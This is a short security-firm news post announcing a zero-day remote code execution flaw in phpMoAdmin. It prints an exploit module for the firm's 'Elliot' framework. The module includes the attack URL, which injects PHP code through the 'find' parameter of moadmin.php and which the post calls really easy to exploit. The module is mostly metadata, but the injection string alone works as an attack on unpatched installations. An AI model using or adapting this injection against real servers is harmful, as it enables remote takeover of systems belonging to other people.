phpMoAdmin 0day with D2 Elliot

We identified a remote code execution vulnerability on the last version of phpMoAdmin. The exploitation is really easy with Elliot. Here is the exploit code:


#
# Copyright DSquare Security, LLC, 2015
#

from core.templates.exploits import *


class MyExploit(xRCERegexp):

    uid = 'E-444'

    _extra_description = {
        'name': 'phpMoAdmin RCE',
        'creation': '2015/03/03',
        'lastupdate': '2015/03/03',
        'description': 'Remote command execution in phpMoAdmin (moadmin.php)',
        'comment': '',
        'author': ('',),
        'vendor': 'phpMoAdmin',
        'zeroday': True,
        'published': '2015/03/03',
        'references': (),
        'cve': (),
        'vulnid': (),
        'platform': Platform.All,
        'application': 'phpMoAdmin',
        'version': (),
        'module': '',
        'requirements': {},
        'payload': Payload.PHP,
        'family': Family.RCE,
        'googledork': '',
        'stealth': Stealth.Stealth,
    }

    vuln_page_default = 'moadmin.php?action=listRows&collection=nothing&find=array();<PAYLOAD>;die()'

Back to News

Share :   Facebook   Twitter   Google+